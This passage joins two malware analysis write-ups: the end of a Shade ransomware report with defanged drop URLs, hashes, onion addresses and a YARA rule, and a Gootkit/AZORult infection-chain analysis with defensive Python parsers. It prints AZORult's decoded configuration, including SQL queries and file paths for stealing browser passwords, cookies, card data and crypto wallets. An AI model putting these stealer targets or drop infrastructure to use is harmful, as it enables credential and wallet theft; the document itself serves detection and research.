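    "hxxp://rentacar.baynuri[.]net/wp-admin/css/colors/blue/messg[.]jpg",
    "hxxp://emlak.baynuri[.]net/wp-includes/ID3/messg[.]jpg",
    "hxxp://old.vide-crede[.]pl/administrator/cache/messg[.]jpg",
    "hxxp://grenop-invest[.]cz/bin/messg[.]jpg",
]

# Assumed path markers: directories that only exist in a default install of each CMS.
WORDPRESS_MARKERS = ("/wp-content/", "/wp-admin/", "/wp-includes/")
JOOMLA_MARKERS = ("/templates/", "/administrator/", "/media/system/", "/components/", "/modules/")


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging used in the report."""
    return ioc.replace("hxxps://", "https://").replace("hxxp://", "http://").replace("[.]", ".")


def defang(url: str) -> str:
    """Reverse of refang, for pasting results back into a report or blocklist."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


def guess_cms(path: str) -> str:
    if any(marker in path for marker in WORDPRESS_MARKERS):
        return "WordPress"
    if any(marker in path for marker in JOOMLA_MARKERS):
        return "Joomla"
    return "unknown"


def triage(iocs: List[str]) -> List[Dict[str, str]]:
    """One row per indicator with the fields an analyst sorts and counts on."""
    rows = []
    for ioc in iocs:
        url = urlsplit(refang(ioc))
        rows.append({
            "host": url.hostname or "",
            "scheme": url.scheme,
            "path": url.path,
            "cms": guess_cms(url.path),
            "payload": url.path.rsplit("/", 1)[-1],
        })
    return rows


def cms_breakdown(rows: List[Dict[str, str]]) -> Counter:
    return Counter(row["cms"] for row in rows)


def hosts(rows: List[Dict[str, str]]) -> List[str]:
    return sorted({row["host"] for row in rows})


def payload_names(rows: List[Dict[str, str]]) -> Counter:
    return Counter(row["payload"] for row in rows)


def blocklist(rows: List[Dict[str, str]]) -> List[str]:
    """Defanged host list, one entry per compromised site."""
    return [defang(host) for host in hosts(rows)]


if __name__ == "__main__":
    table = triage(SAMPLE_IOCS)
    print(cms_breakdown(table))
    print(payload_names(table))
    print("\n".join(blocklist(table)))
```

Paths such as /.well-known/acme-challenge/ carry no CMS marker but are a hint in their own right: they are web-server-writable directories that a stolen credential or an upload flaw can reach without touching the application at all.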

Hash (SHA256): bf32e333d663fe20ab1c77d2f3f3af946fb159c51b1cd3b4b2afd6fc3e1897bb
Threat: Shade ransomware
Description: Fake image containing the Shade ransomware payload
Ssdeep: 24576:kcDD3THmsmB7K1k52fzgtv0HqIYG3yC3Q1KbeRho7KWU8RKDyAlAY:bTHmsq72zgtv0HYG37bD7KWU8UhV

Table 1: Shade ransomware sample information.

Despite its popularity, the Shade payload did not show a high detection rate at analysis time: only about a third of the anti-malware engines detected it (24/69), even though the behavior of the threat is as disruptive as it is recognizable. Shade encrypts all the user files with AES, then appends the “.crypted000007” suffix to them and creates the ransom note in every folder of the system; the text is written in both English and Russian.

Figure 5. VirusTotal view reporting the malware’s detection rate.
Figure 6. Background of the infected machine, after encryption phase.
Figure 7. Content of README.txt file.

Browsing the specified darknet website shows a page containing a form to get in touch with the attacker, which asks for the code extracted from the ransom note and an email address:

Figure 8. Ransomware Onion website.

Analyzing 2017 threat reports, we noticed the onion address did not change over time; a different story for the email address.

Figure 9. Comparison between the ransom note of Shade 2019 (up) and Shade 2017 (down, source: SonicWall).

Shade connects to its C2 server using embedded Tor libraries and downloads additional modules, such as the aforementioned “CMSBrute” or the “ZCash miner”. The behavioral analysis session recorded the execution of the ZCash miner, stored in the “C:\ProgramData\SoftwareDistribution\” folder.

Figure 10. Information about miner executable.

A quick review of the launch parameters shows interesting information:

Despite this important information, it is difficult to identify the real amount cashed out, because attackers typically use mixing techniques to hinder investigations. However, the mining pool dashboard provides a clue about the current number of infected machines.

Figure 11. Flypool dashboard reporting info about attacker’s wallet.

Conclusions

The available OSINT places the origin of the Troldesh threat in mid-2017 and shows that the attackers did not change their modus operandi and infrastructure much: the same wallet ID has been maintained over the years, and propagation techniques and patterns are quite constant too.

Moreover, the long list of compromised sites reported in the IoC section demonstrates once again how weak credentials are leveraged by such threat actors to run profitable, years-long malicious campaigns without deep and costly changes to their TTPs.

Indicators of Compromise

Drop URLs
11/02
hxxp://projectmmo[.]ru/blog/slavneft.zakaz.zip
hxxp://equiracing[.]fr/templates/rhuk_milkyway_equiracing/css/messg[.]jpg
hxxp://coptermotion[.]aero/css/messg[.]jpg
hxxp://usep75[.]fr/wp-content/themes/usep75-2011_/js/messg[.]jpg
hxxp://www.katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://www[.]coptermotion[.]aero/css/messg[.]jpg
hxxp://senital[.]co[.]uk/templates/a4joomla-ocean-free/js/messg[.]jpg
hxxp://meble-robert[.]pl/wp-content/themes/septera/cryout/css/messg[.]jpg
hxxp://grenop-invest[.]cz/bin/messg[.]jpg

13/02
hxxp://primeeast[.]net/images/slavneft.zakaz.zip
hxxp://service.baynuri[.]net/.well-known/acme-challenge/messg[.]jpg
hxxp://parrocchiadellannunziata[.]it/cache/_system/messg[.]jpg

14/02
hxxp://emlak.baynuri[.]net/wp-includes/ID3/messg[.]jpg
hxxp://aslike[.]org/templates/beez_20/css/messg[.]jpg
hxxps://sobornarada.gov[.]ua/templates/soborna/css/docx.zip
hxxps://sobornarada.gov[.]ua/templates/soborna/css/slavneft.zakaz.zip
hxxps://sobornarada.gov[.]ua/templates/soborna/css/messg[.]jpg
hxxps://nts-solution[.]net/wp-content/themes/Mobera/img/messg[.]jpg
hxxps://nts-solution[.]net/wp-content/themes/Mobera/img/slavneft.zakaz.zip
hxxp://ilan.baynuri[.]net/.well-known/acme-challenge/messg[.]jpg
hxxp://ilan.baynuri[.]net/.well-known/acme-challenge/slavneft.zakaz.zip
hxxp://rentacar.baynuri[.]net/wp-admin/css/colors/blue/messg[.]jpg
hxxp://rentacar.baynuri[.]net/wp-admin/css/colors/blue/slavneft.zakaz.zip
hxxp://deflektori[.]ru/buyme/i/slavneft.zakaz.zip
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/slavneft.zakaz.zip

15/02
hxxp://lingvaworld[.]ru/media/system/css/messg[.]jpg
hxxp://3forfree[.]org/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://firstbaptisthackensack[.]org/templates/hexa_corp/cache/messg[.]jpg
hxxp://caringsoul[.]org/includes/messg[.]jpg
hxxp://semiworldwide[.]net/templates/home/html/_mod_search/messg[.]jpg
hxxp://strewn[.]org/reductio/messg[.]jpg


hxxp://www.clermontmasons[.]org/wp-content/backwpup-c60dd-logs/messg[.]jpg
hxxp://efficientlifechurch[.]org/wp-content/plugins/backupcreator/messg[.]jpg
hxxp://www.taoday[.]net/wp-content/themes/twentyten/languages/messg[.]jpg
hxxp://master-of-bitcoin[.]net/.well-known/pki-validation/messg[.]jpg
hxxp://choinkimarkus[.]pl/wp-content/themes/unicon/framework/admin/ReduxCore/assets/css/color-picker/messg[.]jpg
hxxp://thu-san-world-challenges[.]org/wp-includes/ID3/messg[.]jpg
hxxp://na-korable[.]ru/websitemap/messg[.]jpg
hxxp://www[.]caringsoul[.]org/includes/messg[.]jpg
hxxp://stellacosmeticos[.]com/images/M_images/messg[.]jpg
hxxp://caringsoul[.]org/includes/messg[.]jpg
hxxp://semiworldwide[.]net/templates/home/html/_mod_search/messg[.]jpg
hxxp://lingvaworld[.]ru/media/system/css/messg[.]jpg
hxxp://strewn[.]org/reductio/messg[.]jpg
hxxp://firstbaptisthackensack[.]org/templates/hexa_corp/cache/messg[.]jpg
hxxp://3forfree[.]org/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://manhtructhanhtin[.]com/wp-content/themes/flatsome/woocommerce/back-comp/cart/messg[.]jpg
hxxp://alax.nexxtech[.]fr/classes/logs/messg[.]jpg
hxxps://www.panska[.]cz/includes/messg[.]jpg
hxxp://aslike[.]org/templates/beez_20/css/messg[.]jpg
hxxps://www.hiwentis[.]de/wp-content/themes/Anthem/js/messg[.]jpg
hxxp://hiwentis[.]de/wp-content/themes/Anthem/js/messg[.]jpg
hxxp://wcf-old.sibcat[.]info/messg[.]jpg
hxxp://mobshop.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://p30qom[.]ir/templates/kalaresan/css/messg[.]jpg
hxxp://thorxer[.]de/templates/siteground-j15-85/images/messg[.]jpg
hxxp://northmaint[.]se/wp-content/themes/Divi/psd/messg[.]jpg
hxxp://mod.sibcat[.]info/messg[.]jpg
hxxp://www.blackout[.]pub/wp-content/themes/gutenberg/builder/templates/blog/formats/messg[.]jpg
hxxp://blackout[.]pub/wp-content/themes/gutenberg/builder/templates/blog/formats/messg[.]jpg
hxxp://www.medgen[.]pl/templates/medgen/less/messg[.]jpg
hxxp://medgen[.]pl/templates/medgen/less/messg[.]jpg
hxxp://www.medgen[.]pl/templates/medgen/html/com_content/article/messg[.]jpg
hxxp://medgen[.]pl/templates/medgen/html/com_content/article/messg[.]jpg
hxxp://akiko.izmsystem[.]net/wordpress/wp-admin/css/colors/blue/messg[.]jpg
hxxp://waterfordcomputers[.]ie/wp-content/themes/WCv15/includes/css/messg[.]jpg
hxxp://comsystem[.]ch/templates/orange/css/messg[.]jpg
hxxp://dreams-innovations[.]com/wp-content/themes/ecommerce-solution/inc/messg[.]jpg
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://klotho[.]net/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://coptermotion[.]aero/css/messg[.]jpg
hxxp://usep75[.]fr/wp-content/themes/usep75-2011_/js/messg[.]jpg
hxxp://lam[.]cz/templates/lam/css/messg[.]jpg
hxxp://parrocchiadellannunziata[.]it/cache/_system/messg[.]jpg
hxxp://senital[.]co.uk/templates/a4joomla-ocean-free/js/messg[.]jpg
hxxp://doktech.cba[.]pl/includes/Archive/messg[.]jpg
hxxp://www[.]coptermotion[.]aero/css/messg[.]jpg
hxxp://www.katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://meble-robert[.]pl/wp-content/themes/septera/cryout/css/messg[.]jpg
hxxp://grenop-invest[.]cz/bin/messg[.]jpg
hxxp://schmutzki[.]de/content/themes/schmutzki-child/img/devices/messg[.]jpg
hxxp://americanstaffordshireterrier[.]it/messg[.]jpg
hxxp://biurorachunkowe24.waw[.]pl/templates/ruralidyll/css/messg[.]jpg
hxxp://lipraco[.]cz/templates/lipraco/css/messg[.]jpg
hxxps://schmutzki[.]de/content/themes/schmutzki-child/img/devices/messg[.]jpg
hxxp://lutnikwitwicki[.]pl/templates/dd_horse_31/inc/messg[.]jpg
hxxp://rivercitylitho[.]com/templates/rt_anacron/css-compiled/messg[.]jpg
hxxp://rivercitylitho[.]com/templates/rt_anacron/custom/messg[.]jpg
hxxp://uborprofit[.]com/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://erataqim[.]com.my/1/wp-admin/css/colors/blue/messg[.]jpg
hxxp://expert-centr[.]com/errordocs/style/messg[.]jpg
hxxp://home-spy-shop[.]com/wp-content/themes/magazine-basic/languages/messg[.]jpg
hxxp://schmutzki[.]de/content/themes/schmutzki-child/lang/messg[.]jpg
hxxp://pausin-fotografie[.]de/wp-content/themes/prophoto5/js/plugins/messg[.]jpg
hxxp://old.vide-crede[.]pl/administrator/cache/messg[.]jpg
hxxp://nkcatering[.]pl/wp-content/themes/vogue/templates/contents/messg[.]jpg
hxxp://berplamon[.]de/wp-content/themes/gridalicious/languages/messg[.]jpg
hxxp://nexxtech[.]fr/interactifs-aceto/messg[.]jpg
hxxp://asztar[.]pl/templates/theme1627/css/messg[.]jpg
hxxp://isolation.nucleus.odns[.]fr/wp-content/languages/plugins/messg[.]jpg
hxxp://brigitte-family[.]com/wp-content/languages/plugins/messg[.]jpg


Hashes

OTHER

Email
pilotpilot088 @ gmail.com

URL
hxxp:// cryptsen7fo43rr6[.onion/
hxxp:// cryptsen7fo43rr6[.onion.to/
hxxp:// cryptsen7fo43rr6[.onion.cab/

Yara Rule

import "pe"
rule Shade_Ransomware_18_02_2019{

    meta:
        description = "Yara Rule for Shade_Ransomware"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_18"
        tlp = "white"
        category = "informational"

    strings:
        $a = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
        $b = {55 8B EC 81 EC E0 04 00 00 C7 45 F0 02 00 00 00 C6 85 B6 FE}
        $c = {58 00 00 0F 85 2C FF FF FF EB 00 6A 03 6A}
        $d = {58 00 ?C 5? 58 00 ?0 5? 58 00 ?4 5? 58 00 ?8}

    condition:
        pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and all of them
}

This blog post was authored by Antonio Farina, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB


Gootkit: Unveiling the Hidden Link with AZORult

Introduction

In the last days a huge attack campaign hit several organizations across the Italian cyberspace; as stated in bulletin N020219, the attack waves tried to impersonate legitimate communications from a well-known express courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkit payload.

Technical analysis

Stage 1 - The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the time able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash: 12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threat: malicious js
Description: Obfuscated malicious JS. It downloads the first component and keeps communicating with the C2 server.

Table 1: Generic information about the malicious JS file

This JS file is an obfuscated dropper whose purpose is to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld[.]com and driverconnectsearch[.]info. The behaviour of this sort of JavaScript stager is as essential as it is interesting: it downloads other executable code able to do virtually anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript that contacts its remote infrastructure in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet archive encoded within the chunk of executable JavaScript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.

As shown in Figure 3, the first characters of the encoded payload string are “TVNDRg”, which base64-decodes to “MSCF”: the standard header of the Microsoft Cabinet compressed file format.

Figure 4: JavaScript downloaded from the driverconnectsearch[.]info server.
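The “TVNDRg” clue above is enough to carve the embedded cabinet out of a captured stager response. The following is an added example, not code from the original post or from the analysed sample: it scans JavaScript text for base64 runs that decode to an MSCF header, parses the cabinet directory (CFHEADER and CFFILE records) and reports the embedded file names, flagging a download that was cut short; the stager text and the cabinet it carries are constructed for the demo.

```python
"""Carve base64-encoded Microsoft Cabinet (CAB) archives out of JavaScript stager responses."""
import base64
import binascii
import json
import re
import struct

# base64 of the CFHEADER signature b"MSCF" is "TVNDRg"; a base64 run starting with it is a
# candidate cabinet and must be long enough to hold at least the 36-byte CFHEADER (48 chars).
CAB_B64_RE = re.compile(r"TVNDRg[A-Za-z0-9+/]{42,}={0,2}")


def b64decode_lenient(text: str) -> bytes:
    """Decode base64 even when the stager strips the '=' padding."""
    text = text.rstrip("=")
    return base64.b64decode(text + "=" * (-len(text) % 4))


def parse_cab(blob: bytes) -> dict:
    """Parse CFHEADER and the CFFILE directory of a cabinet (layout per the MS-CAB format).

    Raises ValueError when the bytes are not a plausible cabinet, so false positives are skipped.
    """
    if len(blob) < 36 or blob[:4] != b"MSCF":
        raise ValueError("missing MSCF signature")
    (_r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, flags, _set_id, _i_cabinet) = struct.unpack_from("<5IBB5H", blob, 4)
    if (ver_major, ver_minor) != (1, 3) or c_folders == 0 or c_files == 0:
        raise ValueError("implausible CFHEADER values")
    if not 36 <= coff_files < len(blob):
        raise ValueError("CFFILE offset outside blob")
    files = []
    off = coff_files
    for _ in range(c_files):
        if off + 16 > len(blob):
            raise ValueError("truncated CFFILE record")
        cb_file, _uoff, _i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", blob, off)
        off += 16
        end = blob.find(b"\x00", off)
        if end < 0:
            raise ValueError("unterminated CFFILE name")
        enc = "utf-8" if attribs & 0x80 else "latin-1"   # 0x80 = _A_NAME_IS_UTF
        files.append({"name": blob[off:end].decode(enc, errors="replace"), "size": cb_file})
        off = end + 1
    return {
        "cabinet_size": cb_cabinet,
        "truncated": len(blob) < cb_cabinet,   # the header declares more bytes than we received
        "folders": c_folders,
        "flags": flags,
        "files": files,
    }


def carve_cabs(js_text: str) -> list:
    """Return every cabinet embedded as a base64 string in the given JavaScript text."""
    found = []
    for m in CAB_B64_RE.finditer(js_text):
        try:
            info = parse_cab(b64decode_lenient(m.group(0)))
        except (ValueError, binascii.Error):
            continue                         # base64 run that is not a real cabinet
        info["offset"] = m.start()
        found.append(info)
    return found


def build_constructed_cab(name: bytes = b"payload.exe", data: bytes = b"MZ" + b"\x90" * 14) -> bytes:
    """Build a minimal single-file, stored (uncompressed) cabinet for the demo; constructed, not a real sample."""
    cffile = struct.pack("<IIHHHH", len(data), 0, 0, 0x4E21, 0, 0x20) + name + b"\x00"
    cffile_off = 36 + 8                       # CFHEADER followed by one 8-byte CFFOLDER
    cfdata_off = cffile_off + len(cffile)
    total = cfdata_off + 8 + len(data)        # one CFDATA block: 8-byte header plus raw bytes
    header = b"MSCF" + struct.pack("<5IBB5H", 0, total, 0, cffile_off, 0, 3, 1, 1, 1, 0, 0x1234, 0)
    cffolder = struct.pack("<IHH", cfdata_off, 1, 0)   # one CFDATA block, typeCompress 0 = stored
    cfdata = struct.pack("<IHH", 0, len(data), len(data)) + data
    return header + cffolder + cffile + cfdata


# Constructed stand-in for the JavaScript returned by the second server: the cabinet sits in a string literal.
CONSTRUCTED_STAGER_JS = (
    'var payload = "' + base64.b64encode(build_constructed_cab()).decode("ascii") + '";\n'
    "// ... the real stager decodes this and writes it under %APPDATA%\\Local\\Temp\\\n"
)

if __name__ == "__main__":
    print(json.dumps(carve_cabs(CONSTRUCTED_STAGER_JS), indent=2))
```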

Stage 2 - The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file:

Hash: 2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
Threat: RuntimeBroker5.exe
Description: First component downloaded by the malicious JS file.

Table 2: Generic information about RuntimeBroker5.exe (AZORult)

When executed, the RuntimeBroker5.exe sample behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample does not perform only this download. Here is one of the key points of the article: it also establishes a communication channel with the AZORult C2 host “ssl[.]admin[.]itybuy[.]it”.

The network packets exchanged with the server confirm this identification, due to the known communication patterns, and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the files written in the “%APPDATA%\Local\Temp\” path closely match the AZORult analysis published by the Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

firefox.exe
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
%appdata%\Mozilla\Firefox\Profiles\
MozillaFireFox
CurrentVersion
Install_Directory
nss3.dll
thunderbird.exe
SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
SOFTWARE\Mozilla\Mozilla Thunderbird
SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
%appdata%\Thunderbird\Profiles\
ThunderBird
SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSS_Shutdown
PK11_FreeSlot
logins.json
logins
hostname
timesUsed
encryptedUsername
encryptedPassword
cookies.sqlite
formhistory.sqlite
%LOCALAPPDATA%\Google\Chrome\User Data\
%LOCALAPPDATA%\Google\Chrome SxS\User Data\
%LOCALAPPDATA%\Xpom\User Data\
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
%LOCALAPPDATA%\Comodo\Dragon\User Data\
%LOCALAPPDATA%\Amigo\User Data\
%LOCALAPPDATA%\Orbitum\User Data\
%LOCALAPPDATA%\Bromium\User Data\
%LOCALAPPDATA%\Chromium\User Data\
%LOCALAPPDATA%\Nichrome\User Data\
%LOCALAPPDATA%\RockMelt\User Data\
%LOCALAPPDATA%\360Browser\Browser\User Data\
%LOCALAPPDATA%\Vivaldi\User Data\
%APPDATA%\Opera Software\
%LOCALAPPDATA%\Go!\User Data\
%LOCALAPPDATA%\Sputnik\Sputnik\User Data\
%LOCALAPPDATA%\Kometa\User Data\
%LOCALAPPDATA%\uCozMedia\Uran\User Data\
%LOCALAPPDATA%\QIP Surf\User Data\
%LOCALAPPDATA%\Epic Privacy Browser\User Data\
%APPDATA%\brave\
%LOCALAPPDATA%\CocCoc\Browser\User Data\
%LOCALAPPDATA%\CentBrowser\User Data\
%LOCALAPPDATA%\7Star\7Star\User Data\
%LOCALAPPDATA%\Elements Browser\User Data\
%LOCALAPPDATA%\TorBro\Profile\
%LOCALAPPDATA%\Suhba\User Data\
%LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
%LOCALAPPDATA%\Rafotech\Mustang\User Data\
%LOCALAPPDATA%\Superbird\User Data\
%LOCALAPPDATA%\Chedot\User Data\
%LOCALAPPDATA%\Torch\User Data\
GoogleChrome
GoogleChrome64
InternetMailRu
YandexBrowser
ComodoDragon
Amigo
Orbitum
Bromium
Chromium
Nichrome
RockMelt
360Browser
Vivaldi
Opera
GoBrowser
Sputnik
Kometa
Uran
QIPSurf
Epic
Brave
CocCoc
CentBrowser
7Star
ElementsBrowser
TorBro
Suhba
SaferBrowser
Mustang
Superbird
Chedot
Torch
Login Data
Web Data
SELECT origin_url, username_value, password_value FROM logins
SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
SELECT name, value FROM autofill
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
%APPDATA%\Microsoft\Windows\Cookies\
%APPDATA%\Microsoft\Windows\Cookies\Low\
%LOCALAPPDATA%\Microsoft\Windows\INetCache\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
InternetExplorer
InternetExplorerLow
InternetExplorerINetCache
MicrosoftEdge_AC_INetCookies
MicrosoftEdge_AC_001
MicrosoftEdge_AC_002
MicrosoftEdge_AC
Software\Microsoft\Internet Explorer
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
POP3
IMAP
SMTP
HTTP
%appdata%\Waterfox\Profiles\
Waterfox
%appdata%\Comodo\IceDragon\Profiles\
IceDragon
%appdata%\8pecxstudios\Cyberfox\Profiles\
Cyberfox
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_column_bytes
sqlite3_finalize
%APPDATA%\filezilla\recentservers.xml
<RecentServers>
</RecentServers>
<Server>
</Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass>
</Pass>
<Pass encoding="base64">
FileZilla
ole32.dll
CLSIDFromString
{4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
{3CCD5499-87A8-4B10-A215-608888DD3B55}
vaultcli.dll
VaultOpenVault
VaultEnumerateItems
VaultGetItem
MicrosoftEdge
Browsers\AutoComplete
CookieList.txt
SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
%appdata%\Moonchild Productions\Pale Moon\Profiles\
PaleMoon
%appdata%\Electrum\wallets\
\Electrum
%appdata%\Electrum-LTC\wallets\
\Electrum-LTC
%appdata%\ElectrumG\wallets\
\ElectrumG
%appdata%\Electrum-btcp\wallets\
\Electrum-btcp
%APPDATA%\Ethereum\keystore\
\Ethereum
%APPDATA%\Exodus\
\Exodus
\Exodus Eden
*.json,*.seco
%APPDATA%\Jaxx\Local Storage\
\Jaxx\Local Storage\
%APPDATA%\MultiBitHD\
\MultiBitHD
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
.wallet
wallets\.wallet
wallet.dat
wallets\wallet.dat
electrum.dat
wallets\electrum.dat
Software\monero-project\monero-core
wallet_path
Bitcoin\Bitcoin-Qt
BitcoinGold\BitcoinGold-Qt
BitCore\BitCore-Qt
Litecoin\Litecoin-Qt
BitcoinABC\BitcoinABC-Qt
%APPDATA%\Exodus Eden\
%Appdata%\Psi+\profiles\
%Appdata%\Psi\profiles\
<roster-cache>
</roster-cache>
<jid type="QString">
<password type="QString">
</password>

Table 3: AZORult Configuration file

The multiple references to browser cookies and crypto wallets confirm that the “RuntimeBroker5.exe” sample, initially hidden inside the cabinet archive, is an AZORult variant.
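A decoded configuration like Table 3 is easier to report on once it is structured. The following added example (not part of the original post) pairs each run of environment-rooted paths with the block of labels that follows it, as in the Chromium section of the dump above, and collects the SQL queries and database file names; it leaves the interleaved wallet entries as unpaired paths. The excerpt is quoted from the configuration above, and the browser-family heuristic (“Profiles\” for Gecko-style, “User Data\” for Chromium-style stores) is an assumption of this example.

```python
"""Structure a decoded AZORult configuration dump into the credential stores and queries it targets."""
import json
import re

# Excerpt quoted from the decoded configuration shown above (not the full dump).
CONFIG_EXCERPT = r"""
%appdata%\Mozilla\Firefox\Profiles\
MozillaFireFox
logins.json
cookies.sqlite
%LOCALAPPDATA%\Google\Chrome\User Data\
%LOCALAPPDATA%\Chromium\User Data\
%LOCALAPPDATA%\Vivaldi\User Data\
%APPDATA%\Opera Software\
GoogleChrome
Chromium
Vivaldi
Opera
Login Data
Web Data
SELECT origin_url, username_value, password_value FROM logins
SELECT name, value FROM autofill
%APPDATA%\filezilla\recentservers.xml
FileZilla
%appdata%\Electrum\wallets\
\Electrum
""".strip()

PATH_RE = re.compile(r"^%[A-Za-z_]+%\\")       # environment-rooted directory or file target
LABEL_RE = re.compile(r"^[A-Za-z0-9_]+$")      # bare identifier the stealer uses as the store's label
SQL_RE = re.compile(r"^SELECT\s", re.IGNORECASE)
DBFILE_RE = re.compile(r"^(?:[\w ]+\.(?:sqlite|json|dat|xml)|Login Data|Web Data)$")


def parse_config(text: str) -> dict:
    """Walk the dump line by line; a run of N paths followed by N labels is a parallel-array table."""
    lines = [ln.rstrip("\r") for ln in text.splitlines() if ln.strip()]
    stores, unpaired, queries, db_files = [], [], [], []
    i = 0
    while i < len(lines):
        if PATH_RE.match(lines[i]):
            j = i
            while j < len(lines) and PATH_RE.match(lines[j]):
                j += 1
            paths = lines[i:j]
            labels = lines[j:j + len(paths)]
            if len(labels) == len(paths) and all(LABEL_RE.match(lab) for lab in labels):
                stores.extend({"label": lab, "path": p} for p, lab in zip(paths, labels))
                i = j + len(paths)
            else:
                unpaired.extend(paths)        # e.g. wallet entries, where a "\Name" suffix follows instead
                i = j
            continue
        ln = lines[i]
        if SQL_RE.match(ln):
            queries.append(ln)
        elif DBFILE_RE.match(ln):
            db_files.append(ln)
        i += 1
    return {"stores": stores, "unpaired_paths": unpaired, "queries": queries, "db_files": db_files}


def family_of(path: str) -> str:
    """Heuristic assumed by this example: Gecko-style profile trees vs Chromium-style 'User Data' trees."""
    low = path.lower()
    if low.endswith("\\profiles\\"):
        return "gecko"
    if low.endswith("\\user data\\"):
        return "chromium"
    return "other"


def summarize_families(cfg: dict) -> dict:
    """Count targeted stores per family; the family decides which SQL schema and APIs the stealer needs."""
    counts = {}
    for store in cfg["stores"]:
        fam = family_of(store["path"])
        counts[fam] = counts.get(fam, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_config(CONFIG_EXCERPT)
    print(json.dumps(parsed, indent=2))
    print(summarize_families(parsed))
```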

Stage 3 - The Payload

The other file downloaded from hairpd[.]com by the AZORult sample is another PE32 executable.

Figure 8: GET request to download the payload.

Hash: a75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threat: sputik.exe
Description: Second component downloaded by the malware. This component stays alive after the infection.

Table 4: Generic information about sputik.exe (Gootkit)

The “sputik.exe” sample uses a set of evasion techniques to avoid process monitoring, such as invoking the “UuidCreateSequential” API to detect the MAC addresses typical of virtual machines; this technique, however, can be easily bypassed by spoofing the address of a real network card.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

